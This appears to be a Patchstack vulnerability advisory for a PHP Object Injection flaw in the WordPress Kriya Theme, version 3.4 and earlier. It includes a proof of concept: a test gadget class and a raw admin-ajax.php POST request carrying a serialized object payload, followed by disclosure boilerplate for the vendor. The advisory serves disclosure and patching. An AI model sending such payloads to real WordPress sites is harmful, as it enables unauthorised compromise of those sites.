WordPress Kriya Theme <= 3.4 is vulnerable to PHP Object Injection
Claim ownership and start a managed Vulnerability Disclosure Program.
Apply for mVDP
Vulnerability description
Bonds discovered and reported this PHP Object Injection vulnerability in WordPress Kriya Theme to Patchstack.
See tips for patching this kind of vulnerabilityHow to reproduce
theme affected by auth php object injection
put code in wp-config.php
// Example class for PHP Object Injection PoC
class ObjectInjection
{
public $test;
function __destruct(){
die("PHP Object Injection: " . $this->test);
}
}
1 hit
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: SITE
Cookie: ...
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
action=kriya_backup_and_restore_action&type=import_options&data=O:15:"ObjectInjection":1:{s:4:"test";N;}
Additional comment by Patchstack
*) patch validated, waiting confirmation on exact patched version
How to disclose
To make the patching process easier and safer for all users, we recommend reading our memo about the most common vulnerabilities and the way these can be fixed. If you need help understanding some of the security concepts, don’t worry. That’s when we step in and help.
Please send us the patched version or code before releasing it, so we could help you avoid incomplete patches that could lead to inconveniences. Don’t delay security patch releases for other non-security updates. Ideally, security fixes would be released separately so users could update ASAP without fear of anything breaking. You can also join the free Patchstack mVDP program to have better control over the vulnerability patching and disclosure process.
Bonds
Provide link to fix
